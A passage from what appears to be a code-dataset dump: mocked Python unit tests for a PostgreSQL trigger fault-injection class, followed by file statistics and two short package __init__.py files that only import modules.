connect_mock.cursor.assert_called_once()
connect_mock.close.assert_called_once()
cursor_mock.execute.assert_called_once()
cursor_mock.fetchone.assert_called_once()
cursor_mock.close.assert_called_once()
@patch.object(psycopg2, 'connect')
def test_is_trigger_exist_for_error(self, psycopg2_patch):
connect_mock = Mock(name='connect_mock')
psycopg2_patch.return_value = connect_mock
cursor_mock = Mock(name='cursor_mock')
connect_mock.cursor.return_value = cursor_mock
connect_mock.close.return_value = True
cursor_mock.execute.return_value = 1
cursor_mock.fetchone.side_effect = Exception("Not able to fetch data from db")
cursor_mock.close.return_value = True
self.assertFalse(self.fault.is_trigger_exist())
self.assertEqual(1, psycopg2_patch.call_count)
connect_mock.cursor.assert_called_once()
connect_mock.close.assert_called_once()
cursor_mock.execute.assert_called_once()
cursor_mock.fetchone.assert_called_once()
cursor_mock.close.assert_called_once()
@patch.object(psycopg2, 'connect')
def test_trigger_injection(self, psycopg2_patch):
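        # trigger_injection() should check for an existing trigger, install one, and commit the change.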
connect_mock = Mock(name='connect_mock')
psycopg2_patch.return_value = connect_mock
cursor_mock = Mock(name='cursor_mock')
connect_mock.cursor.return_value = cursor_mock
connect_mock.close.return_value = True
connect_mock.commit.return_value = True
cursor_mock.execute.return_value = 1
cursor_mock.fetchone.side_effect = [[True], [0]]
cursor_mock.close.return_value = True
self.fault.trigger_injection()
self.assertEqual(2, psycopg2_patch.call_count)
self.assertEqual(2, connect_mock.cursor.call_count)
connect_mock.close.assert_called()
self.assertEqual(2, cursor_mock.execute.call_count)
cursor_mock.close.assert_called()
connect_mock.commit.assert_called()
    @patch.object(psycopg2, 'connect')
    def test_remediate(self, psycopg2_patch):
        connect_mock = Mock(name='connect_mock')
        psycopg2_patch.return_value = connect_mock
        cursor_mock = Mock(name='cursor_mock')
        connect_mock.cursor.return_value = cursor_mock
        connect_mock.close.return_value = True
        connect_mock.commit.return_value = True
        cursor_mock.execute.return_value = 1
        cursor_mock.close.return_value = True
        # Stub os._exit so remediation cannot terminate the test process.
        os._exit = MagicMock()
        self.fault.remediate()
        self.assertEqual(1, psycopg2_patch.call_count)
        self.assertEqual(1, connect_mock.cursor.call_count)
        connect_mock.close.assert_called()
        self.assertEqual(1, cursor_mock.execute.call_count)
        cursor_mock.close.assert_called()
        connect_mock.commit.assert_called()
        # assert os._exit.called
    @patch.object(psycopg2, 'connect')
    def test_clean(self, psycopg2_patch):
        # clean() should return True when the cleanup statement commits successfully.
        connect_mock = Mock(name='connect_mock')
        psycopg2_patch.return_value = connect_mock
        cursor_mock = Mock(name='cursor_mock')
        connect_mock.cursor.return_value = cursor_mock
        connect_mock.close.return_value = True
        connect_mock.commit.return_value = True
        cursor_mock.execute.return_value = 1
        cursor_mock.close.return_value = True
        self.assertTrue(self.fault.clean())
        self.assertEqual(1, psycopg2_patch.call_count)
        self.assertEqual(1, connect_mock.cursor.call_count)
        connect_mock.close.assert_called()
        self.assertEqual(1, cursor_mock.execute.call_count)
        cursor_mock.close.assert_called()
        connect_mock.commit.assert_called()
    @patch.object(psycopg2, 'connect')
    def test_clean_for_error(self, psycopg2_patch):
        # A commit failure should make clean() return False.
        connect_mock = Mock(name='connect_mock')
        psycopg2_patch.return_value = connect_mock
        cursor_mock = Mock(name='cursor_mock')
        connect_mock.cursor.return_value = cursor_mock
        connect_mock.close.return_value = True
        connect_mock.commit.side_effect = Exception("Error during commit")
        cursor_mock.execute.return_value = 1
        cursor_mock.close.return_value = True
        self.assertFalse(self.fault.clean())
        self.assertEqual(1, psycopg2_patch.call_count)
        self.assertEqual(1, connect_mock.cursor.call_count)
        connect_mock.close.assert_called()
        self.assertEqual(1, cursor_mock.execute.call_count)
        cursor_mock.close.assert_called()
        connect_mock.commit.assert_called()
    @classmethod
    def tearDown(cls):
        print("Called tearDown() function")
        cls.fault = None

if __name__ == '__main__':
    unittest.main()
| 43.86036 | 111 | 0.701962 | 1,175 | 9,737 | 5.485957 | 0.08766 | 0.133106 | 0.063295 | 0.058641 | 0.819578 | 0.804685 | 0.789172 | 0.776295 | 0.768694 | 0.754576 | 0 | 0.012605 | 0.201499 | 9,737 | 221 | 112 | 44.058824 | 0.816463 | 0.002259 | 0 | 0.680412 | 0 | 0 | 0.070079 | 0.002699 | 0 | 0 | 0 | 0 | 0.340206 | 1 | 0.082474 | false | 0.010309 | 0.036082 | 0 | 0.123711 | 0.010309 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c73b8e820a6c08b76b01b2c10ee394c0921b3dbc | 191 | py | Python | robo_utils/oxford/__init__.py | IamWangYunKai/DG-TrajGen | 0a8aab7e1c05111a5afe43d53801c55942e9ff56 | ["MIT"] | 31 | 2021-09-15T00:43:43.000Z | 2022-03-27T22:57:21.000Z | robo_utils/oxford/__init__.py | IamWangYunKai/DG-TrajGen | 0a8aab7e1c05111a5afe43d53801c55942e9ff56 | ["MIT"] | 1 | 2021-12-09T03:08:13.000Z | 2021-12-15T07:08:31.000Z | robo_utils/oxford/__init__.py | IamWangYunKai/DG-TrajGen | 0a8aab7e1c05111a5afe43d53801c55942e9ff56 | ["MIT"] | 2 | 2021-11-26T05:45:18.000Z | 2022-01-19T12:46:41.000Z |
from . import utils
from .partial import PartialDataset
from .process import ProcessUtils
from .partial_augment import PartialDatasetAugment
from .partial_master import PartialDatasetMaster | 27.285714 | 50 | 0.863874 | 21 | 191 | 7.761905 | 0.52381 | 0.202454 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109948 | 191 | 7 | 51 | 27.285714 | 0.958824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c7d1b55d9dbaae3a7d25aa933a7d0bca9daa0a5b | 45 | py | Python | common/__init__.py | codestetic/optionworkshop | f7f8c7ab1744069255da0d156916d0c376137040 | [
"MIT"
] | null | null | null | common/__init__.py | codestetic/optionworkshop | f7f8c7ab1744069255da0d156916d0c376137040 | [
"MIT"
] | null | null | null | common/__init__.py | codestetic/optionworkshop | f7f8c7ab1744069255da0d156916d0c376137040 | [
"MIT"
] | null | null | null | from common.instruments.option_type import *
| 22.5 | 44 | 0.844444 | 6 | 45 | 6.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.902439 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |